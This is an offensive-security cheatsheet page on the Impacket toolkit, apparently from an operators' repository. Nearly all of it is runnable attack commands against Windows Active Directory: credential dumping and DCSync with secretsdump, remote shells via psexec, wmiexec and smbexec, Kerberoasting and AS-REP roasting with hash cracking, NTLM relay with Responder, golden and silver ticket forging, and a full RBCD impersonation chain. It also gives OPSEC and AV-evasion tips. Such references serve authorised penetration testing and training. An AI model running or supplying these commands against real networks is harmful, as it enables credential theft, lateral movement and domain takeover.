daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

impacket.md (16981B)


      1 ---
      2 title: "Impacket"
      3 description: "Impacket suite: secretsdump, psexec/wmiexec, GetUserSPNs, ntlmrelayx, ticketer, smbserver and more."
      4 category: active-directory
      5 subcategory: "Tooling & Recon"
      6 tags: [active-directory, smb, credentials, lateral-movement]
      7 tools: [Impacket]
      8 difficulty: intermediate
      9 updated: "2026-08-09"
     10 source: "repo:Active-Directory/Impacket_Cheatsheet.md"
     11 ---
     12 
     13 # Impacket
     14 
     15 The Python toolkit for Windows network protocol implementation and exploitation (SMB/RPC/LDAP/Kerberos).
     16 
     17 > **Note —** On Kali the example scripts are installed with an `impacket-` prefix (e.g. `impacket-secretsdump`, `impacket-GetUserSPNs`). A pip install exposes them as the bare `*.py` names used below. Use whichever your environment provides.
     18 
     19 ## Authentication Methods Summary
     20 
     21 All Impacket tools support multiple authentication methods:
     22 
     23 | Method | Syntax | Description |
     24 |:-------|:-------|:------------|
     25 | Password | `domain/user:password@target` | Standard credentials |
     26 | NTLM Hash (PtH) | `-hashes LM:NT domain/user@target` | Pass-the-Hash |
     27 | Kerberos Ticket (PtT) | `-k -no-pass domain/user@target` | Pass-the-Ticket (with `KRB5CCNAME` set) |
     28 | AES Key | `-aesKey <key> domain/user@target` | Kerberos AES key |
     29 | Null Session | `domain/''@target` or `-no-pass` | Anonymous/null auth |
     30 
     31 ### Common Global Flags
     32 
     33 | Flag | Purpose |
     34 |:-----|:--------|
     35 | `-dc-ip IP` | Domain Controller IP |
     36 | `-dc-host HOST` | Domain Controller hostname |
     37 | `-k` | Use Kerberos authentication |
     38 | `-no-pass` | Don't prompt for password |
     39 | `-hashes LM:NT` | Pass-the-Hash |
     40 | `-aesKey KEY` | Use AES key |
     41 | `-debug` | Enable debug output |
     42 | `-target-ip IP` | Target IP when using Kerberos |
     43 
     44 ## secretsdump.py
     45 
     46 The crown jewel of Impacket. Extracts credentials from Windows systems via multiple methods: SAM database, LSA secrets, cached domain credentials, and NTDS.dit (the AD database).
     47 
     48 How it works:
     49 
     50 ```text
     51 [1] Connects via SMB/RPC to the target
     52 [2] Dumps the SAM hive (local accounts)
     53 [3] Extracts LSA secrets (service account passwords, machine account keys)
     54 [4] If targeting a DC: uses DRSUAPI (DCSync) or VSS to pull NTDS.dit
     55 ```
     56 
     57 Common usage:
     58 
     59 ```bash
     60 # Remote dump with plaintext credentials
     61 secretsdump.py domain.local/administrator:P@ssw0rd@10.10.10.10
     62 
     63 # Remote dump with NTLM hash (Pass-the-Hash)
     64 secretsdump.py -hashes :aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 domain.local/administrator@10.10.10.10
     65 
     66 # Remote dump with Kerberos ticket (Pass-the-Ticket)
     67 export KRB5CCNAME=/path/to/ticket.ccache
     68 secretsdump.py -k -no-pass domain.local/administrator@dc01.domain.local
     69 
     70 # DCSync specific user only
     71 secretsdump.py -just-dc-user krbtgt domain.local/administrator:P@ssw0rd@10.10.10.10
     72 
     73 # DCSync NTLM hashes only (skip Kerberos keys)
     74 secretsdump.py -just-dc-ntlm domain.local/administrator:P@ssw0rd@10.10.10.10
     75 
     76 # Offline extraction from copied registry hives
     77 secretsdump.py -sam SAM -security SECURITY -system SYSTEM LOCAL
     78 
     79 # Offline extraction from NTDS.dit
     80 secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL
     81 ```
     82 
     83 Key flags:
     84 
     85 | Flag | Purpose |
     86 |:-----|:--------|
     87 | `-just-dc` | Only DCSync, skip SAM/LSA |
     88 | `-just-dc-user USER` | DCSync single account |
     89 | `-just-dc-ntlm` | DCSync NTLM only, no Kerberos keys |
     90 | `-use-vss` | Use Volume Shadow Copy instead of DRSUAPI |
     91 | `-exec-method {smbexec,wmiexec,mmcexec}` | Method for VSS commands |
     92 | `-history` | Include password history |
     93 | `-outputfile FILE` | Write output to file |
     94 
     95 ## psexec.py
     96 
     97 The classic remote execution method. Mimics Sysinternals PsExec by uploading a service binary to `ADMIN$` and registering it as a Windows service.
     98 
     99 How it works:
    100 
    101 ```text
    102 [1] Authenticates to SMB on the target
    103 [2] Uploads a service executable to ADMIN$ (C:\Windows)
    104 [3] Connects to the Service Control Manager (SCM) via RPC
    105 [4] Creates and starts a new service pointing to the uploaded binary
    106 [5] Service connects back, providing an interactive shell
    107 [6] On exit, stops/deletes the service and removes the binary
    108 ```
    109 
    110 Common usage:
    111 
    112 ```bash
    113 # Interactive shell
    114 psexec.py domain.local/administrator:P@ssw0rd@10.10.10.10
    115 
    116 # Execute single command
    117 psexec.py domain.local/administrator:P@ssw0rd@10.10.10.10 "ipconfig /all"
    118 
    119 # Pass-the-Hash
    120 psexec.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 domain.local/administrator@10.10.10.10
    121 psexec.py -hashes :aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 domain.local/administrator@10.10.10.10
    122 
    123 # Specify alternate executable (useful for AV evasion)
    124 psexec.py -file /path/to/custom.exe domain.local/administrator:P@ssw0rd@10.10.10.10
    125 
    126 # Use specific share
    127 psexec.py -path C$ domain.local/administrator:P@ssw0rd@10.10.10.10
    128 ```
    129 
    130 Key flags:
    131 
    132 | Flag | Purpose |
    133 |:-----|:--------|
    134 | `-file FILE` | Use custom executable instead of default |
    135 | `-path SHARE` | Use alternate share (default: ADMIN$) |
    136 | `-service-name NAME` | Custom service name |
    137 | `-remote-binary-name NAME` | Custom name for uploaded binary |
    138 | `-codec CODEC` | Output encoding (e.g. utf-8, cp850) |
    139 
    140 > **OPSEC —** High noise: creates files, services, and event logs; detected by most EDR. Consider `wmiexec.py` or `smbexec.py` for stealth.
    141 
    142 ## wmiexec.py
    143 
    144 Stealthier alternative to psexec. Uses Windows Management Instrumentation (WMI) for command execution. No binary dropped to disk.
    145 
    146 How it works:
    147 
    148 ```text
    149 [1] Authenticates via DCOM/WMI
    150 [2] Creates a Win32_Process to execute commands
    151 [3] Output is written to a file in ADMIN$, read back via SMB, then deleted
    152 [4] Semi-interactive shell (each command is a new process)
    153 ```
    154 
    155 Common usage:
    156 
    157 ```bash
    158 # Interactive shell
    159 wmiexec.py domain.local/administrator:P@ssw0rd@10.10.10.10
    160 
    161 # Execute single command
    162 wmiexec.py domain.local/administrator:P@ssw0rd@10.10.10.10 "whoami /priv"
    163 
    164 # Pass-the-Hash
    165 wmiexec.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 domain.local/administrator@10.10.10.10
    166 
    167 # Kerberos authentication
    168 export KRB5CCNAME=admin.ccache
    169 wmiexec.py -k -no-pass administrator@dc01.domain.local
    170 
    171 # Silently execute (no output retrieval)
    172 wmiexec.py -silentcommand domain.local/administrator:P@ssw0rd@10.10.10.10 "powershell -enc BASE64..."
    173 ```
    174 
    175 Key flags:
    176 
    177 | Flag | Purpose |
    178 |:-----|:--------|
    179 | `-shell-type {cmd,powershell}` | Shell interpreter |
    180 | `-silentcommand` | Execute without retrieving output |
    181 | `-nooutput` | Don't attempt to retrieve command output |
    182 | `-codec CODEC` | Output encoding |
    183 | `-com-version MAJOR:MINOR` | DCOM version |
    184 
    185 > **OPSEC —** No binary dropped to disk, but still creates a process and writes temporary files; WMI process creation is logged (Event ID 4688 if enabled).
    186 
    187 ## smbexec.py
    188 
    189 Another execution method using native Windows services. Unlike psexec, it doesn't upload a binary — instead it abuses the service binary path to execute commands directly.
    190 
    191 How it works:
    192 
    193 ```text
    194 [1] Creates a service with the command embedded in the service binary path
    195 [2] Example: %COMSPEC% /Q /c echo whoami ^> \\127.0.0.1\C$\output.txt 2^>^&1
    196 [3] Starts the service (executes the command)
    197 [4] Reads output from the created file
    198 [5] Deletes the service
    199 ```
    200 
    201 Common usage:
    202 
    203 ```bash
    204 # Interactive shell
    205 smbexec.py domain.local/administrator:P@ssw0rd@10.10.10.10
    206 
    207 # Pass-the-Hash
    208 smbexec.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 domain.local/administrator@10.10.10.10
    209 
    210 # Specify execution mode
    211 smbexec.py -mode SERVER domain.local/administrator:P@ssw0rd@10.10.10.10
    212 ```
    213 
    214 Key flags:
    215 
    216 | Flag | Purpose |
    217 |:-----|:--------|
    218 | `-mode {SHARE,SERVER}` | Output retrieval method |
    219 | `-share SHARE` | Share for output (default: C$) |
    220 | `-shell-type {cmd,powershell}` | Shell interpreter |
    221 | `-service-name NAME` | Custom service name |
    222 
    223 ## GetUserSPNs.py (Kerberoasting)
    224 
    225 Extracts TGS tickets for accounts with Service Principal Names (SPNs) set. These tickets are encrypted with the service account's password hash and can be cracked offline.
    226 
    227 How it works:
    228 
    229 ```text
    230 [1] Queries LDAP for accounts with servicePrincipalName attribute
    231 [2] Requests TGS tickets for discovered SPNs via Kerberos
    232 [3] Outputs tickets in crackable format (Hashcat/John)
    233 ```
    234 
    235 Common usage:
    236 
    237 ```bash
    238 # Enumerate SPNs only
    239 GetUserSPNs.py domain.local/user:password -dc-ip 10.10.10.10
    240 
    241 # Request tickets
    242 GetUserSPNs.py domain.local/user:password -dc-ip 10.10.10.10 -request
    243 
    244 # Output to file in Hashcat format
    245 GetUserSPNs.py domain.local/user:password -dc-ip 10.10.10.10 -request -outputfile kerberoast.txt
    246 
    247 # Target specific user
    248 GetUserSPNs.py domain.local/user:password -dc-ip 10.10.10.10 -request-user sqlservice
    249 
    250 # Using Pass-the-Hash
    251 GetUserSPNs.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 domain.local/user -dc-ip 10.10.10.10 -request
    252 
    253 # Using Kerberos auth
    254 export KRB5CCNAME=user.ccache
    255 GetUserSPNs.py -k -no-pass -dc-host dc01.domain.local domain.local/user -request
    256 ```
    257 
    258 Cracking the hashes:
    259 
    260 ```bash
    261 # Hashcat (TGS-REP, etype 23 / RC4)
    262 hashcat -m 13100 kerberoast.txt wordlist.txt -r rules/best64.rule
    263 
    264 # John
    265 john --wordlist=wordlist.txt kerberoast.txt
    266 ```
    267 
    268 Key flags:
    269 
    270 | Flag | Purpose |
    271 |:-----|:--------|
    272 | `-request` | Request TGS tickets |
    273 | `-request-user USER` | Target specific account |
    274 | `-outputfile FILE` | Save tickets to file |
    275 | `-usersfile FILE` | Check specific users from file |
    276 | `-save` | Save tickets as ccache files |
    277 
    278 ## GetNPUsers.py (AS-REP Roasting)
    279 
    280 Targets accounts with "Do not require Kerberos pre-authentication" enabled. Requests AS-REP responses containing the user's encrypted timestamp (crackable offline).
    281 
    282 How it works:
    283 
    284 ```text
    285 [1] Sends AS-REQ without pre-authentication data
    286 [2] If the account doesn't require pre-auth, the KDC returns AS-REP
    287 [3] The AS-REP contains encrypted data using the user's password hash
    288 [4] Extract and crack offline
    289 ```
    290 
    291 Common usage:
    292 
    293 ```bash
    294 # Check known user
    295 GetNPUsers.py domain.local/targetuser -dc-ip 10.10.10.10 -no-pass
    296 
    297 # Enumerate and request (requires valid creds)
    298 GetNPUsers.py domain.local/user:password -dc-ip 10.10.10.10 -request
    299 
    300 # Spray userlist (no auth required)
    301 GetNPUsers.py domain.local/ -usersfile users.txt -dc-ip 10.10.10.10 -format hashcat
    302 
    303 # Output to file
    304 GetNPUsers.py domain.local/ -usersfile users.txt -dc-ip 10.10.10.10 -format hashcat -outputfile asrep.txt
    305 ```
    306 
    307 Cracking the hashes:
    308 
    309 ```bash
    310 # Hashcat (AS-REP, etype 23 / RC4)
    311 hashcat -m 18200 asrep.txt wordlist.txt -r rules/best64.rule
    312 
    313 # John
    314 john --wordlist=wordlist.txt asrep.txt
    315 ```
    316 
    317 Key flags:
    318 
    319 | Flag | Purpose |
    320 |:-----|:--------|
    321 | `-request` | Request AS-REP |
    322 | `-usersfile FILE` | List of users to test |
    323 | `-format {hashcat,john}` | Output format |
    324 | `-outputfile FILE` | Save hashes to file |
    325 | `-no-pass` | No password (required for unauthenticated enum) |
    326 
    327 ## ntlmrelayx.py
    328 
    329 Captures NTLM authentication and relays it to other services (SMB, LDAP, MSSQL, HTTP, IMAP, etc.).
    330 
    331 How it works:
    332 
    333 ```text
    334 [1] Sets up rogue server(s) to capture authentication
    335 [2] When a victim authenticates, relays the credential exchange to a target
    336 [3] Uses the relayed session to perform actions (execute commands, dump hashes, modify AD, etc.)
    337 ```
    338 
    339 Common usage:
    340 
    341 ```bash
    342 # Basic relay to SMB
    343 ntlmrelayx.py -tf targets.txt -smb2support
    344 
    345 # Relay and execute command
    346 ntlmrelayx.py -tf targets.txt -smb2support -c "whoami > C:\\pwned.txt"
    347 
    348 # Relay to LDAP and escalate via delegation (RBCD)
    349 ntlmrelayx.py -t ldap://dc01.domain.local --delegate-access
    350 
    351 # Relay to LDAP and add computer
    352 ntlmrelayx.py -t ldap://dc01.domain.local --add-computer ATTACKER01
    353 
    354 # Relay to LDAP and perform DCSync ACL abuse
    355 ntlmrelayx.py -t ldap://dc01.domain.local --escalate-user compromiseduser
    356 
    357 # SOCKS proxy mode (keeps sessions alive)
    358 ntlmrelayx.py -tf targets.txt -smb2support -socks
    359 # Then use proxychains with other tools
    360 
    361 # Serve a malicious WPAD file
    362 ntlmrelayx.py -tf targets.txt -smb2support -wh attacker-wpad
    363 
    364 # Relay IPv6 (combine with mitm6)
    365 ntlmrelayx.py -6 -tf targets.txt -smb2support -wh wpad.domain.local
    366 ```
    367 
    368 Key flags:
    369 
    370 | Flag | Purpose |
    371 |:-----|:--------|
    372 | `-tf FILE` | File containing target hosts |
    373 | `-t TARGET` | Single target URL |
    374 | `-smb2support` | Enable SMB2 support |
    375 | `-socks` | Enable SOCKS proxy for captured sessions |
    376 | `-c COMMAND` | Command to execute on successful relay |
    377 | `-e FILE` | Execute file on successful relay |
    378 | `--delegate-access` | Create computer and set RBCD |
    379 | `--escalate-user USER` | Add DCSync rights to user |
    380 | `--add-computer` | Add a computer account |
    381 | `-wh HOST` | WPAD host for redirect |
    382 | `-6` | Enable IPv6 |
    383 | `-i` | Interactive SMB shell |
    384 
    385 Combining with Responder:
    386 
    387 ```bash
    388 # Terminal 1: Disable SMB/HTTP in Responder.conf, then:
    389 responder -I eth0
    390 
    391 # Terminal 2:
    392 ntlmrelayx.py -tf targets.txt -smb2support -socks
    393 ```
    394 
    395 ## getTGT.py / getST.py
    396 
    397 Request Kerberos tickets for use with Pass-the-Ticket attacks.
    398 
    399 ### getTGT.py - Request TGT
    400 
    401 ```bash
    402 # With password
    403 getTGT.py domain.local/user:password -dc-ip 10.10.10.10
    404 # Outputs: user.ccache
    405 
    406 # With NTLM hash (Overpass-the-Hash)
    407 getTGT.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 domain.local/user -dc-ip 10.10.10.10
    408 
    409 # With AES key
    410 getTGT.py -aesKey <aes256_key> domain.local/user -dc-ip 10.10.10.10
    411 ```
    412 
    413 ### getST.py - Request Service Ticket
    414 
    415 ```bash
    416 # Request ticket for specific SPN
    417 getST.py -spn cifs/fileserver.domain.local -dc-ip 10.10.10.10 domain.local/user:password
    418 
    419 # S4U2Self (impersonate user to self)
    420 getST.py -spn cifs/target.domain.local -impersonate Administrator -dc-ip 10.10.10.10 domain.local/machineaccount$:password
    421 
    422 # S4U2Proxy (constrained delegation abuse)
    423 getST.py -spn cifs/dc01.domain.local -impersonate Administrator -dc-ip 10.10.10.10 domain.local/service:password
    424 ```
    425 
    426 Using the tickets:
    427 
    428 ```bash
    429 # Set environment variable
    430 export KRB5CCNAME=/path/to/user.ccache
    431 
    432 # Use with any Impacket tool
    433 wmiexec.py -k -no-pass user@target.domain.local
    434 secretsdump.py -k -no-pass user@dc01.domain.local
    435 smbclient.py -k -no-pass user@fileserver.domain.local
    436 ```
    437 
    438 ## ticketer.py (Golden/Silver Tickets)
    439 
    440 Forges Kerberos tickets for persistence or privilege escalation.
    441 
    442 ### Golden Ticket
    443 
    444 Requires: `krbtgt` hash, Domain SID.
    445 
    446 ```bash
    447 # Forge Golden Ticket for Administrator
    448 ticketer.py -nthash <krbtgt_nthash> -domain-sid S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX -domain domain.local Administrator
    449 
    450 # With AES key
    451 ticketer.py -aesKey <krbtgt_aes256_key> -domain-sid S-1-5-21-... -domain domain.local Administrator
    452 
    453 # With specific groups
    454 ticketer.py -nthash <krbtgt_hash> -domain-sid S-1-5-21-... -domain domain.local -groups 512,513,518,519,520 Administrator
    455 ```
    456 
    457 ### Silver Ticket
    458 
    459 Requires: Service account hash, Domain SID, target SPN.
    460 
    461 ```bash
    462 # Forge Silver Ticket for CIFS on specific host
    463 ticketer.py -nthash <service_hash> -domain-sid S-1-5-21-... -domain domain.local -spn cifs/fileserver.domain.local Administrator
    464 ```
    465 
    466 Using forged tickets:
    467 
    468 ```bash
    469 export KRB5CCNAME=Administrator.ccache
    470 psexec.py -k -no-pass Administrator@dc01.domain.local
    471 ```
    472 
    473 ## smbclient.py
    474 
    475 Interactive SMB client for browsing shares and transferring files.
    476 
    477 ```bash
    478 # Connect to target
    479 smbclient.py domain.local/user:password@10.10.10.10
    480 ```
    481 
    482 Inside the shell:
    483 
    484 ```text
    485 # List shares
    486 shares
    487 
    488 # Navigate
    489 use C$
    490 cd Windows
    491 ls
    492 pwd
    493 
    494 # Download files
    495 get ntds.dit
    496 mget *.txt
    497 
    498 # Upload files
    499 put payload.exe
    500 
    501 # File info
    502 info file.txt
    503 ```
    504 
    505 Key commands:
    506 
    507 | Command | Purpose |
    508 |:--------|:--------|
    509 | `shares` | List available shares |
    510 | `use SHARE` | Connect to a share |
    511 | `ls` | List directory contents |
    512 | `cd DIR` | Change directory |
    513 | `get FILE` | Download file |
    514 | `put FILE` | Upload file |
    515 | `mget PATTERN` | Download multiple files |
    516 | `cat FILE` | Display file contents |
    517 | `info FILE` | File metadata |
    518 | `rm FILE` | Delete file |
    519 | `mkdir DIR` | Create directory |
    520 
    521 ## rbcd.py (Resource-Based Constrained Delegation)
    522 
    523 Configures RBCD to enable service impersonation attacks.
    524 
    525 Attack chain:
    526 
    527 ```text
    528 [1] Have GenericWrite/GenericAll over a computer object
    529 [2] Create or control a computer account (need its credentials)
    530 [3] Configure RBCD to allow your controlled account to impersonate users to the target
    531 [4] Request S4U2Self + S4U2Proxy tickets
    532 [5] Access target as impersonated user
    533 ```
    534 
    535 Usage:
    536 
    537 ```bash
    538 # Configure RBCD
    539 rbcd.py -delegate-from ATTACKER$ -delegate-to TARGET$ -action write domain.local/user:password -dc-ip 10.10.10.10
    540 
    541 # Read current RBCD config
    542 rbcd.py -delegate-to TARGET$ -action read domain.local/user:password -dc-ip 10.10.10.10
    543 
    544 # Remove RBCD
    545 rbcd.py -delegate-from ATTACKER$ -delegate-to TARGET$ -action remove domain.local/user:password -dc-ip 10.10.10.10
    546 ```
    547 
    548 Complete attack workflow:
    549 
    550 ```bash
    551 # 1. Add computer (if needed)
    552 addcomputer.py -computer-name ATTACKER$ -computer-pass 'P@ssw0rd123' domain.local/user:password
    553 
    554 # 2. Configure RBCD
    555 rbcd.py -delegate-from ATTACKER$ -delegate-to TARGET$ -action write domain.local/user:password
    556 
    557 # 3. Get impersonation ticket
    558 getST.py -spn cifs/TARGET.domain.local -impersonate Administrator -dc-ip 10.10.10.10 domain.local/ATTACKER$:'P@ssw0rd123'
    559 
    560 # 4. Use ticket
    561 export KRB5CCNAME=Administrator.ccache
    562 secretsdump.py -k -no-pass TARGET.domain.local
    563 ```